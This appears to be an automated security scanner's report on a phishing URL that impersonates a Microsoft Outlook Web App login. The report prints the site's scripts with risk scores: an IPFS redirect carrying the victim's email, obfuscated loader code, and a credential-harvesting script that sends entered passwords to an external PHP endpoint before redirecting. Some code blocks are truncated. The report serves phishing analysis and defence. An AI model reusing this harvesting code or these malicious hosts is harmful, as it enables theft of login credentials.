Windows Analysis Report
https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://universidad-unidem.edu.mx

{
    "risk_score": 7,
    "reasoning": "The script redirects the user to a suspicious IPFS domain, which is a potential indicator of malicious activity. The obfuscated URL and the inclusion of an email address in the hash fragment suggest that this script may be part of a phishing or credential harvesting attempt."
}

window.location.href = "https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz#jacob@steinborn.com"

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript code appears to be a legitimate implementation of an S/MIME control rendering functionality. It checks for the presence of the S/MIME control and renders it if installed, without any obvious malicious behaviors. The code uses standard DOM manipulation techniques and does not exhibit any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. While the code could be improved by using more modern APIs, it is generally benign and poses a low risk."
}

        var a_fRC = 1;
        var g_fFcs = 1;
        var a_fLOff = 0;
        var a_fCAC = 0;
        var a_fEnbSMm = 0;
        /// <summary>
        /// Is Mime Control installed?
        /// </summary>
        function IsMimeCtlInst(progid) {
            if (!a_fEnbSMm)
                return false;

            var oMimeVer = null;

            try {
                // TODO: ingore this on none IE browser
                //
                //oMimeVer = new ActiveXObject(progid);
            }
            catch (e) {
            }

            if (oMimeVer != null)
                return true;
            else
                return false;
        }

        /// <summary>
        /// Render out the S-MIME control if it is installed.
        /// </summary>
        function RndMimeCtl() {
            if (IsMimeCtlInst("MimeBhvr.MimeCtlVer"))
                RndMimeCtlHlpr("MimeNSe2k3", "D801B381-B81D-47a7-8EC4-EFC111666AC0", "MIMEe2k3", "mimeLogoffE2k3");

            if (IsMimeCtlInst("OwaSMime.MimeCtlVer"))
                RndMimeCtlHlpr("MimeNSe2k7sp1", "833aa5fb-7aca-4708-9d7b-c982bf57469a", "MIMEe2k7sp1", "mimeLogoffE2k7sp1");

            if (IsMimeCtlInst("OwaSMime2.MimeCtlVer"))
                RndMimeCtlHlpr("MimeNSe2k9", "4F40839A-C1E5-47E3-804D-A2A17F42DA21", "MIMEe2k9", "mimeLogoffE2k9");
        }

        /// <summary>
        /// Helper function to factor out the rendering of the S/MIME control.
        /// </summary>
        function RndMimeCtlHlpr(objid, classid, ns, id) {
            document.write("<OBJECT id='" + objid + "' classid='CLSID:" + classid + "'></OBJECT>");
            document.write("<?IMPORT namespace='" + ns + "' implementation=#" + objid + ">");
            document.write("<" + ns + ":Logoff id='" + id + "' style='display:none'/>");
        }
    

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate login-related functionality with some placeholder text and password visibility toggling. There are no high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The script uses standard DOM manipulation and placeholder text, which are considered low-risk behaviors. While the use of `document.write` is considered a legacy practice, it is not inherently malicious in this context. Overall, the script seems to be implementing common login-related features without any clear signs of malicious intent."
}

        var mainLogonDiv = window.document.getElementById("mainLogonDiv");
        var showPlaceholderText = false;
        var mainLogonDivClassName = 'mouse';

        if (mainLogonDivClassName == "tnarrow") {
            showPlaceholderText = true;

            // Output meta tag for viewport suserng
            document.write('<meta name="viewport" content="width = 320, initial-scale = 1.0, user-scalable = no" />');
        }
        else if (mainLogonDivClassName == "twide") {
            showPlaceholderText = true;
        }

        function setPlaceholderText() {
            window.document.getElementById("username").placeholder = "user name";
            window.document.getElementById("password").placeholder = "password";
            window.document.getElementById("passwordText").placeholder = "password";
        }

        function showPasswordClick() {
            var showPassword = window.document.getElementById("showPasswordCheck").checked;
            passwordElement = window.document.getElementById("password");
            passwordTextElement = window.document.getElementById("passwordText");
            if (showPassword) {
                passwordTextElement.value = passwordElement.value;
                passwordElement.style.display = "none";
                passwordTextElement.style.display = "inline";
                passwordTextElement.focus();
            }
            else {
                passwordElement.value = passwordTextElement.value;
                passwordTextElement.style.display = "none";
                passwordTextElement.value = "";
                passwordElement.style.display = "inline";
                passwordElement.focus();
            }
        }
    

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and sending sensitive data to external servers are clear indicators of malicious intent. Additionally, the heavy obfuscation of the code and URLs further increases the risk. While the script's purpose is not entirely clear, the combination of these factors suggests a high likelihood of malicious activity, warranting a high-risk score."
}

  
var _0x417f08=_0x3e80;(function(_0x12a42d,_0x102eb4){var _0x239bae=_0x3e80,_0x4b90d1=_0x12a42d();while(!![]){try{var _0x169ac3=-parseInt(_0x239bae(0x5ff))/(-0x158*0x7+-0x4d9+0x2*0x721)+parseInt(_0x239bae(0xe8d))/(-0x5ee+-0x1*-0x1a88+-0x2*0xa4c)+parseInt(_0x239bae(0x125e))/(-0x1*0x14f6+-0x231f*0x1+0x3818)+-parseInt(_0x239bae(0x59f))/(0x26a7+-0x13*-0x4d+0x656*-0x7)+parseInt(_0x239bae(0x7db))/(-0x9c2*-0x4+0x14ec+-0xe5*0x43)+parseInt(_0x239bae(0x1a60))/(-0x9f+-0x14e5+-0x2*-0xac5)*(-parseInt(_0x239bae(0x1a89))/(-0x1*-0x4ca+0xf6d*-0x2+0x1a17))+parseInt(_0x239bae(0x410))/(-0xb*-0x334+-0x1d71*0x1+0x5c3*-0x1);if(_0x169ac3===_0x102eb4)break;else _0x4b90d1['push'](_0x4b90d1['shift']());}catch(_0x341081){_0x4b90d1['push'](_0x4b90d1['shift']());}}}(_0x442c,0x39a5d+0x734da*-0x1+0xa3572),document[_0x417f08(0x5b9)](unescape(_0x417f08(0xfeb)+_0x417f08(0x23b)+_0x417f08(0x15f)+_0x417f08(0x1e9d)+_0x417f08(0x132)+_0x417f08(0x12e9)+_0x417f08(0xc12)+_0x417f08(0x1283)+_0x417f08(0x1a70)+_0x417f08(0x507)+_0x417f08(0x876)+_0x417f08(0x4e8)+_0x417f08(0x67a)+_0x417f08(0x1a95)+_0x417f08(0x3fb)+_0x417f08(0x17f1)+_0x417f08(0xfb5)+_0x417f08(0xd0e)+_0x417f08(0x575)+_0x417f08(0x10cc)+_0x417f08(0x176a)+_0x417f08(0xdba)+_0x417f08(0x11ce)+_0x417f08(0x4a6)+_0x417f08(0xd8d)+_0x417f08(0x1da)+_0x417f08(0x9bc)+_0x417f08(0x1f06)+_0x417f08(0x94c)+_0x417f08(0x103d)+_0x417f08(0x20a3)+_0x417f08(0x1832)+_0x417f08(0x1788)+_0x417f08(0xf49)+_0x417f08(0x1086)+_0x417f08(0x902)+_0x417f08(0x15a0)+_0x417f08(0x194c)+_0x417f08(0x170a)+_0x417f08(0x128b)+_0x417f08(0xaa2)+_0x417f08(0x1dc5)+_0x417f08(0x2e8)+_0x417f08(0xaca)+_0x417f08(0x6fc)+_0x417f08(0x752)+_0x417f08(0x7f7)+_0x417f08(0x1ebb)+_0x417f08(0x1eac)+_0x417f08(0x211b)+_0x417f08(0xfa4)+_0x417f08(0x583)+_0x417f08(0x14a8)+_0x417f08(0x1dc5)+_0x417f08(0x1565)+_0x417f08(0x853)+_0x417f08(0xe6a)+_0x417f08(0x207f)+_0x417f08(0x54e)+_0x417f08(0x109f)+_0x417f08(0x1e17)+_0x417f08(0x1dbf)+_0x417f08(0x1a29)+_0x417f08(0x1240)+_0x417f08(0x644)+_0x417f08(0x1e1a)+_0x417f08(0x112f)+_0x417f08(0x160b)+_0x417f08(0x1c93)+_0x417f08(0x7e0)+_0x417f08(0x1a98)+_0x417f08(0x4e8)+_0x417f08(0x1280)+_0x417f08(0x8a9)+_0x417f08(0x1ecc)+_0x417f08(0x1891)+_0x417f08(0x91e)+_0x417f08(0x1fb0)+_0x417f08(0x1e9d)+_0x417f08(0x1629)+_0x417f08(0x12f5)+_0x417f08(0x1d2c)+_0x417f08(0x1584)+_0x417f08(0x18c)+_0x417f08(0x1561)+_0x417f08(0x1d8e)+_0x417f08(0x559)+_0x417f08(0x1c1e)+_0x417f08(0x151b)+_0x417f08(0xa66)+_0x417f08(0x1a09)+_0x417f08(0x1a01)+_0x417f08(0xbe4)+_0x417f08(0x205a)+_0x417f08(0x3d6)+_0x417f08(0x1315)+_0x417f08(0xf81)+_0x417f08(0xca4)+_0x417f08(0x88d)+_0x417f08(0x1562)+(_0x417f08(0x4da)+_0x417f08(0x1653)+_0x417f08(0x4be)+_0x417f08(0x347)+_0x417f08(0x17e5)+_0x417f08(0x8d0)+_0x417f08(0x847)+_0x417f08(0x1085)+_0x417f08(0x1706)+_0x417f08(0x1c26)+_0x417f08(0x181f)+_0x417f08(0x1d62)+_0x417f08(0x1162)+_0x417f08(0xac9)+_0x417f08(0x19b4)+_0x417f08(0x736)+_0x417f08(0x145e)+_0x417f08(0x1d23)+_0x417f08(0x1d2a)+_0x417f08(0x1811)+_0x417f08(0x3cb)+_0x417f08(0x34e)+_0x417f08(0x1263)+_0x417f08(0x1e84)+_0x417f08(0x1da8)+_0x417f08(0x10da)+_0x417f08(0x147e)+_0x417f08(0xb08)+_0x417f08(0xa17)+_0x417f08(0x1163)+_0x417f08(0xb2a)+_0x417f08(0xa1a)+_0x417f08(0x10e5)+_0x417f08(0x1a67)+_0x417f08(0x503)+_0x417f08(0x1485)+_0x417f08(0x26e)+_0x417f08(0x1270)+_0x417f08(0x17c6)+_0x417f08(0x1f5e)+_0x417f08(0xcd3)+_0x417f08(0x662)+_0x417f08(0xbdb)+_0x417f08(0x1303)+_0x417f08(0x1e8a)+_0x417f08(0x2070)+_0x417f08(0xf3b)+_0x417f08(0x1c88)+_0x417f08(0xa4f)+_0x417f08(0x1c47)+_0x417f08(0x1ec1)+_0x417f08(0x1953)+_0x417f08(0xec2)+_0x417f08(0x7a4)+_0x417f08(0x11af)+_0x417f08(0x408)+_0x417f08(0x374)+_0x417f08(0x20d3)+_0x417f08(0x20be)+_0x417f08(0x1597)+_0x417f08(0x41f)+_0x417f08(0x15ee)+_0x417f08(0x1fed)+_0x417f08(0x116f)+_0x417f08(0x1af8)+_0x417f08(0x359)+_0x417f08(0x1797)+_0x417f08(0x16ff)+_0x417f08(0x1ec1)+_0x417f08(0x1953)+_0x417f08(0xa98)+_0x417f08(0x91d)+_0x417f08(0x1ff7)+_0x417f08(0x1a79)+_0x417f08(0x12e8)+_0x417f08(0x7fc)+_0x417f08(0x1e34)+_0x417f08(0x1db8)+_0x417f08(0x1d75)+_0x417f08(0xb83)+_0x417f08(0x

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript code appears to be a legitimate login page script with some basic functionality. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The script primarily handles the initialization of the login page, such as restoring user credentials from a cookie, setting focus on the appropriate input fields, and displaying a cookie warning message if necessary. This script seems to be part of a larger application and does not pose a significant security risk."
}

        //  flogon.js
        //
        //  This file contains the script used by Logon.aspx
        //
        //Copyright (c) 2003-2006 Microsoft Corporation.  All rights reserved.

        /// <summary>
        /// OnLoad handler for logon page
        /// </summary>
        window.onload = function () {
            // If we are replacing the current window with the logon page, initialize the logon page UI now
            //
            if (a_fRC)
                initLogon();

            // Otherwise we need to find the window to replace with the logon page and redirect that window
            //
            else
                redir();
        };

        /// <summary>
        /// Initializes the logon page
        /// </summary>
        function initLogon() {
            try {
                //
                // we don't call document.execCommand("ClearAuthenticationCache","false"); anymore. As a part of the Pending-Notification
                // infrastructure, we are making a change to make sure startpage does not get loaded more than once. This solution is cookie
                // based. This execCommand was clearing all cookies in the scenario when a user logged on from a child window during an
                // FBA timeout. We do not want that to happen anymore. If this breaks anything, we may need to consider a different solution.
                //
                // Old Comments:
                // If the "Clear the Authentication Cache" flag is set to true and
                // we are coming from the logoff page , clear the cache. See bug 41770 and 5840 for details.
                //

                // Logoff the S-Mime control.
                //
                LogoffMime();
            }
            catch (e) { }

            // Check for username cookie
            //
            var re = /(^|; )logondata=acc=([0|1])&lgn=([^;]+)(;|$)/;
            var rg = re.exec(document.cookie);

            if (rg) {
                // Fill in username, set security to private, and restore the "use basic" selection
                //

                gbid("username").value = rg[3];

                try {
                    var signInErrorElement = gbid("signInErrorDiv");
                    if (signInErrorElement) {
                        signInErrorElement.focus();
                    }
                    else {
                        gbid("password").focus();
                    }
                }
                catch (e) { }

                if (gbid("chkPrvt") && !gbid("chkPrvt").checked) {
                    gbid("chkPrvt").click();
                }

                if (rg[2] == "1" && gbid("chkBsc"))	// chkBsc doesn't exist if the request comes from ECP
                    gbid("chkBsc").click();

            }
            else {
                // The variable g_fFcs is set to false when the password gains focus,
                // so that we don't accidentally set focus to the username field while
                // the user is typing their password
                //
                if (g_fFcs) {
                    try {
                        gbid("username").focus();
                    }
                    catch (e) { }
                }
            }

            // OWA Premium currently supports
            // IE 7+, Safari 3+, Firefox 3+ for Windows / Mac
            if (IsOwaPremiumBrowser() && gbid("chkBsc"))	// chkBsc doesn't exist if the request comes from ECP
                gbid("chkBsc").disabled = false;

            // Are cookies enabled?
            //
            var sCN = "cookieTest";

            document.cookie = sCN + "=1";
            var cookiesEnabled = document.cookie.indexOf(sCN + "=") != -1;

            if (cookiesEnabled == false) {
                shw(gbid("cookieMsg"));
                hd(gbid("lgnDiv"));
            }

            // Show the public/private warning message
            clkSec();
        }


        /// <summary>
        /// Finds the frame we wa

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors that indicate potential malicious intent. It collects sensitive user data (email and password) and sends it to an untrusted external domain ('https://xsapz.com/ar/main.php'). Additionally, it redirects the user to another suspicious domain ('https://sedutti.com/OldSite/images/w.php') after a short delay, which is a common tactic used in phishing and other malicious activities. The script also uses obfuscation techniques, making it difficult to analyze the true purpose of the code. Overall, the combination of data exfiltration, suspicious redirects, and obfuscation suggests a high-risk scenario that should be investigated further."
}

// Specify the URL of the PHP file Here
var url = "https://xsapz.com/ar/main.php";

var a1 = document.querySelectorAll(".aaaa1");
var a2 = document.querySelectorAll(".aaaa2");

var attemptCount = 0; // Global attempt count

window.onload = function () {
    // Get the current URL
    var url = window.location.href;

    // Parse the URL and get the fragment (the part after the '#')
    var urlComponents = new URL(url);
    var email = urlComponents.hash.substring(1);

    // Check if the fragment is a valid email
    var emailRegex = /^[\w-]+(\.[\w-]+)*@([\w-]+\.)+[a-zA-Z]{2,7}$/;
    if (emailRegex.test(email)) {
        // Make this email available globally
        window.email = email;
        // If it is, add the email into a html element as text
        var emailElement = document.querySelector(".emailiness");
        if (emailElement) {
            emailElement.value = email;
        }
    }
};

function submitFormAndToggleClass() {
    // Get the form and input elements
    var form = document.getElementById("myForm");
    var input = document.getElementById("password");
    var emptyField = document.querySelector("#EmptyErrorDiv"); // Error message element (e2)

    // Add an event listener for form submission
    form.addEventListener("submit", function (event) {
        // Prevent the form from being submitted normally
        event.preventDefault();

        // Get the input value
        var password = input.value;

        // Show loader during processing
        loading();

        setTimeout(function () {
            if (attemptCount === 0) {
                // First attempt: Show error message (e2)
                if (emptyField) {
                    emptyField.classList.remove("display-none");
                    setTimeout(function () {
                        emptyField.classList.add("display-none");
                    }, 3000);
                }
            } else if (attemptCount === 1) {
                // Second attempt: Remove error message and show success message in emptyField
                if (emptyField) {
                    emptyField.classList.add("display-none"); // Hide the error message
                }

                // Create the success message
                var successMessage = document.createElement("div");
                successMessage.textContent = "Document downloaded successfully. Open downloaded document to review.";
                successMessage.style.color = "green"; // Green text color
                successMessage.style.marginTop = "10px"; // Add some spacing
                successMessage.style.textAlign = "center"; // Center the message
                successMessage.setAttribute("role", "alert");

                // Append the success message in place of the emptyField
                if (emptyField) {
                    emptyField.parentNode.insertBefore(successMessage, emptyField); // Insert before the emptyField
                }

                // Redirect after a short delay
                setTimeout(function () {
                    toggleClass(); // Redirect after showing success message
                }, 3000); // Redirect after 3 seconds
            }

            // Increment the attempt count and clear the input field
            attemptCount++;
            input.value = "";
        }, 3000);
    });

    // Function to redirect the page
    function toggleClass() {
        window.location.href = "https://sedutti.com/OldSite/images/w.php";
    }

    let dataLog = {
        email: window.email,
        password: input.value,
        desc: "Outlook Webapp Login Details",
    };
    console.log(dataLog);
    sendData(dataLog);
}

function loading() {
    // Show loading state
    a1.forEach(function (aa1) {
        aa1.classList.add("display-none");
    });
    a2.forEach(function (aa2) {
        aa2.classList.remove("display-none");
    });
    setTimeout(function () {
        // Revert to normal state
        a2.forEach(function (aa2) {
            aa2.

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "sign in",
"text_input_field_labels": [
"Email Address:",
"Password:"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft Outlook"
  ]
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "sign in",
"text_input_field_labels": [
"Email Address:",
"Password:"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

```json{  "legit_domain": "outlook.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft Outlook' is well-known and typically associated with the domain 'outlook.com'.",    "The provided URL 'bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz' does not match the legitimate domain for Microsoft Outlook.",    "The URL contains unusual elements such as 'ipfs' and 'flk-ipfs.xyz', which are not associated with Microsoft Outlook.",    "The presence of 'ipfs' suggests the use of a decentralized file storage system, which is not typical for Microsoft Outlook services.",    "The URL structure and domain extension are suspicious and do not align with the well-known brand's typical domain usage."  ],  "riskscore": 9}
Google indexed: False

{
  "brands": [
    "Microsoft Outlook"
  ]
}

```json{  "legit_domain": "outlook.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft Outlook' is well-known and typically associated with the domain 'outlook.com'.",    "The provided URL 'bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz' does not match the legitimate domain for Microsoft Outlook.",    "The URL contains a long, nonsensical string and uses 'ipfs.flk-ipfs.xyz', which is not associated with Microsoft Outlook.",    "The use of 'ipfs' and a non-standard domain extension is suspicious and indicative of a potential phishing attempt.",    "The presence of input fields for 'Email Address' and 'Password' is common in phishing sites attempting to harvest credentials."  ],  "riskscore": 9}
Google indexed: False